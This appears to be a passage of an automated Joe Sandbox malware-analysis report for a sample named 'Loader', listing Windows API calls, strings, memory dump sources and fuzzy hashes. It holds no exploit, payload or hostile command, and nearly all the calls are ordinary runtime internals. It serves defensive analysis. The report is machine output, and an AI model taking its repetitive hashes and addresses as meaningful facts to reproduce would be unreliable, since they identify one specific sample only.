                                                                                        • Opcode Fuzzy Hash: 505a1e4b7d335f3154b5a5b228ef19f1793563a5c408d61a146dcc7cbdc3b3ee
                                                                                        • Instruction Fuzzy Hash: B841A530E00219ABCF14DF69CC85ADFBBE5AF45318F149166E815BB352D7319E06CB91
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EBEB22
                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00EBEB30
                                                                                        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00EBEB41
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                        • API String ID: 667068680-1047828073
                                                                                        • Opcode ID: 13ebe148e1869a1222839522e4d9cb0de1e1b452461a2ec04d62fd948c81ebe8
                                                                                        • Instruction ID: 02b8541b52e14a4af18aed91a861a8fe2e05a4671fe6c1a5b6d001abfb3adff9
                                                                                        • Opcode Fuzzy Hash: 13ebe148e1869a1222839522e4d9cb0de1e1b452461a2ec04d62fd948c81ebe8
                                                                                        • Instruction Fuzzy Hash: CDD05E759893E86F83109B73BC4E8963E94AB0426130104A9F409F61A0F3B008448B94
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 69ff4c713123762b4e5f75e045e79e0129d9b3e216b69515aeeb6a3282321803
                                                                                        • Instruction ID: fd396dc3e4292bec62739b69be470da07e33dc1a9d4aac697cae5adc33dc4fa8
                                                                                        • Opcode Fuzzy Hash: 69ff4c713123762b4e5f75e045e79e0129d9b3e216b69515aeeb6a3282321803
                                                                                        • Instruction Fuzzy Hash: 4AB1DF70A04249AFDB11DF98DA81BAEBBB5FF55314F14219AE404BB3D2CB719D42CB60
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,00EC9AEB,00EBF5BA,00EBE585), ref: 00EC9B02
                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EC9B10
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EC9B29
                                                                                        • SetLastError.KERNEL32(00000000,00EC9AEB,00EBF5BA,00EBE585), ref: 00EC9B7B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                        • String ID:
                                                                                        • API String ID: 3852720340-0
                                                                                        • Opcode ID: 3f9cfb0f97c5588a732af0e97230ee10e46b8c3ae06a4a81436299a4d978c59b
                                                                                        • Instruction ID: a643fd99d7d2b49e22ed043d91c10318c9c183ccf53924271e1ab802ce909cbf
                                                                                        • Opcode Fuzzy Hash: 3f9cfb0f97c5588a732af0e97230ee10e46b8c3ae06a4a81436299a4d978c59b
                                                                                        • Instruction Fuzzy Hash: 6B016833118A157EA6242675BDCDF1B2AA4EB117B8720133EF115793F2EE134C0B8148
                                                                                        APIs
                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00ECA4DB
                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00ECA754
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallUnexpectedtype_info::operator==
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 2673424686-393685449
                                                                                        • Opcode ID: 5e957b10efabc63d806f3d300a3b5aaaf08460ea14323dce10ae4ef2a9e63f5b
                                                                                        • Instruction ID: 1e976d904edde13338274e1108761c22d7285bb28f340d53cd405d065c560b75
                                                                                        • Opcode Fuzzy Hash: 5e957b10efabc63d806f3d300a3b5aaaf08460ea14323dce10ae4ef2a9e63f5b
                                                                                        • Instruction Fuzzy Hash: D3B17C71800209DFCF18DFA4CA45EAEB7B5BF14308F18656EE8117B212D772D952CB92
                                                                                        APIs
                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C4C39003,?,?,00000000,00EDB3E5,000000FF,?,00EC4B4A,00000002,?,00EC4BE6,00EC7849), ref: 00EC4ABE
                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EC4AD0
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,00EDB3E5,000000FF,?,00EC4B4A,00000002,?,00EC4BE6,00EC7849), ref: 00EC4AF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: 9e87ed44fbbcd90b877f5f5d3177b3d0a28913016d4914acc8c6844203721a72
                                                                                        • Instruction ID: fb23a1b7123063497a4275b4f809554402059c0f3821f1cb24ae9015ed5cedc3
                                                                                        • Opcode Fuzzy Hash: 9e87ed44fbbcd90b877f5f5d3177b3d0a28913016d4914acc8c6844203721a72
                                                                                        • Instruction Fuzzy Hash: 5001F775944759EFCB118F81CC44FAE7BF8FB04B15F010229F821B66D0EB749904CA84
                                                                                        APIs
                                                                                        • __alloca_probe_16.LIBCMT ref: 00ECC59B
                                                                                        • __alloca_probe_16.LIBCMT ref: 00ECC664
                                                                                        • __freea.LIBCMT ref: 00ECC6CB
                                                                                          • Part of subcall function 00ECAD61: RtlAllocateHeap.NTDLL(00000000,00ECCD3A,?,?,00ECCD3A,00000220,?,00000000,?), ref: 00ECAD93
                                                                                        • __freea.LIBCMT ref: 00ECC6DE
                                                                                        • __freea.LIBCMT ref: 00ECC6EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1423051803-0
                                                                                        • Opcode ID: 23bff41472105d510e91f78c53ebae4b2da160527cdda79511d560ec11c389aa
                                                                                        • Instruction ID: 58374e164c93de57a2ce3a2ae43384e3de61594ccfd646972c88838af7bf094d
                                                                                        • Opcode Fuzzy Hash: 23bff41472105d510e91f78c53ebae4b2da160527cdda79511d560ec11c389aa
                                                                                        • Instruction Fuzzy Hash: FA51A3725002066FEB219F64CE81FFB7AA9EF44B18B25252DFD09F6241E772DC528660
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EBE8FB
                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE91A
                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE948
                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE9A3
                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE9BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AcquireExclusiveLock$CurrentThread
                                                                                        • String ID:
                                                                                        • API String ID: 66001078-0
                                                                                        • Opcode ID: 7e146295e943160a57245f9083c17058540e99987ce2c24c8eea3c0ef0f22c59
                                                                                        • Instruction ID: 6d2462ac76463f36a52cf0af08e895471ab0ed49af2f45fef8bd554bab05c032
                                                                                        • Opcode Fuzzy Hash: 7e146295e943160a57245f9083c17058540e99987ce2c24c8eea3c0ef0f22c59
                                                                                        • Instruction Fuzzy Hash: 4F414971900606DFCB64DF65C485AEBB3F8FF84354B105AAAE456B7780E730E988CB51
                                                                                        APIs
                                                                                        • __EH_prolog3.LIBCMT ref: 00EBC05B
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00EBC066
                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00EBC0D4
                                                                                          • Part of subcall function 00EBBF5D: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00EBBF75
                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 00EBC081
                                                                                        • _Yarn.LIBCPMT ref: 00EBC097
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                        • String ID:
                                                                                        • API String ID: 1088826258-0
                                                                                        • Opcode ID: a4af997e549c1b7ac84a952a3ee35d2e3e4843aab609f5702c78430070f47891
                                                                                        • Instruction ID: 9fad3bdbc61f59105ef7e97142ffbc6e59297cc44b6c37ebe1763dbf341ecaca
                                                                                        • Opcode Fuzzy Hash: a4af997e549c1b7ac84a952a3ee35d2e3e4843aab609f5702c78430070f47891
                                                                                        • Instruction Fuzzy Hash: DF019A75A046598BC706EB208886ABE7BA1FB85710B152009F8167B391CF74AE46CBC1
                                                                                        APIs
                                                                                          • Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
                                                                                          • Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059
                                                                                        • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00EC509A,?,?,?,00000055,?,-00000050,?,?,?), ref: 00ECF825
                                                                                        • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00EC509A,?,?,?,00000055,?,-00000050,?,?), ref: 00ECF85C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CodePageValid
                                                                                        • String ID: `/$utf8
                                                                                        • API String ID: 943130320-1698776066
                                                                                        • Opcode ID: fc2b1fcc0a91fda28bef05d4779065690d107dbd4d6fabfcdb0e3e20f5200fba
                                                                                        • Instruction ID: d791320c772c534f32b8addf213ff9f6e737cfd5cb08a05f2da01f7cadd8414d
                                                                                        • Opcode Fuzzy Hash: fc2b1fcc0a91fda28bef05d4779065690d107dbd4d6fabfcdb0e3e20f5200fba
                                                                                        • Instruction Fuzzy Hash: 85510A72600306BADF28AB70CE42FA677EAEF44704F14253EF555B7181F772E9428651
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00ED535D,00000000,?,00EE8180,?,?,?,00ED5294,00000004,InitializeCriticalSectionEx,00EDF434,00EDF43C), ref: 00ED52CE
                                                                                        • GetLastError.KERNEL32(?,00ED535D,00000000,?,00EE8180,?,?,?,00ED5294,00000004,InitializeCriticalSectionEx,00EDF434,00EDF43C,00000000,?,00ECAA0C), ref: 00ED52D8
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00ED5300
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                        • String ID: api-ms-
                                                                                        • API String ID: 3177248105-2084034818
                                                                                        • Opcode ID: 5159c55787b82f4dd7a63c7f06201c3c5b1b7b3377dd66f7145bbe8c34d3b9d8
                                                                                        • Instruction ID: 07cf2920f4e84a5cd71d15411ade68b03aa3a259977ecd5301c1e9e676e32f96
                                                                                        • Opcode Fuzzy Hash: 5159c55787b82f4dd7a63c7f06201c3c5b1b7b3377dd66f7145bbe8c34d3b9d8
                                                                                        • Instruction Fuzzy Hash: 85E09A71280348BBEB201F62ED06F183E59AB00B85F100030FA0CBC0E4E7A2EC118544
                                                                                        APIs
                                                                                        • GetConsoleOutputCP.KERNEL32(C4C39003,00000000,00000000,?), ref: 00ED3122
                                                                                          • Part of subcall function 00ECAE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ECC6C1,?,00000000,-00000008), ref: 00ECAED2
                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00ED3374
                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00ED33BA
                                                                                        • GetLastError.KERNEL32 ref: 00ED345D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                        • String ID:
                                                                                        • API String ID: 2112829910-0
                                                                                        • Opcode ID: 54fc6957762ae60531535e2097ba9d12d49e34baf45afbaafda4151dcd9da4bf
                                                                                        • Instruction ID: e5605da403aaa1f64bcebd692ed782be8495c8346b4261a6f5617927a93763f1
                                                                                        • Opcode Fuzzy Hash: 54fc6957762ae60531535e2097ba9d12d49e34baf45afbaafda4151dcd9da4bf
                                                                                        • Instruction Fuzzy Hash: 20D19AB5D042489FCB15CFA8D980AEDBBF5FF08314F28416AE426FB351D630AA46CB51
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustPointer
                                                                                        • String ID:
                                                                                        • API String ID: 1740715915-0
                                                                                        • Opcode ID: d795a03dca461598cdce4932f74ee096cded75b13c30d624257cb82f2532f7b8
                                                                                        • Instruction ID: 98e42fa7bf54e348b2d36df310f500d156dd7e4a7b09d2bda9e0ea0c8b18a3b2
                                                                                        • Opcode Fuzzy Hash: d795a03dca461598cdce4932f74ee096cded75b13c30d624257cb82f2532f7b8
                                                                                        • Instruction Fuzzy Hash: 1C51E3B26012199FDB298F50DA41FAA77A4FF00318F1C513DE916672A1E733EC42C751
                                                                                        APIs
                                                                                          • Part of subcall function 00ECAE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ECC6C1,?,00000000,-00000008), ref: 00ECAED2
                                                                                        • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00ED0BEA
                                                                                        • __dosmaperr.LIBCMT ref: 00ED0BF1
                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00ED0C2B
                                                                                        • __dosmaperr.LIBCMT ref: 00ED0C32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 1913693674-0
                                                                                        • Opcode ID: 79fa8dc1ea0b7703686d2169e39077123a300fd4f64ef853400894b482df2658
                                                                                        • Instruction ID: 872cdd4b14722949a02105bd62a90f311c79c8025c9faf013bcbc47e9373d248
                                                                                        • Opcode Fuzzy Hash: 79fa8dc1ea0b7703686d2169e39077123a300fd4f64ef853400894b482df2658
                                                                                        • Instruction Fuzzy Hash: 1321C571604215AF9B20AF61C881FABB7A8FF40368F18562EF959F7351D731EC028790
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a2dc49a6c42de7eabae79ed87fde655d44bf8a8d9d39a0d9b5701d67dff6c20e
                                                                                        • Instruction ID: c1aa0a0b40582f965b0bd822bd5e957fbc1bd7a964daa32d38069cd1a88ccdcd
                                                                                        • Opcode Fuzzy Hash: a2dc49a6c42de7eabae79ed87fde655d44bf8a8d9d39a0d9b5701d67dff6c20e
                                                                                        • Instruction Fuzzy Hash: EB21D7712002056FDB10AF618E81FAB77ADAF4336871455ADF919F7152E732EC128790
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00ED1F84
                                                                                          • Part of subcall function 00ECAE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ECC6C1,?,00000000,-00000008), ref: 00ECAED2
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ED1FBC
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ED1FDC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
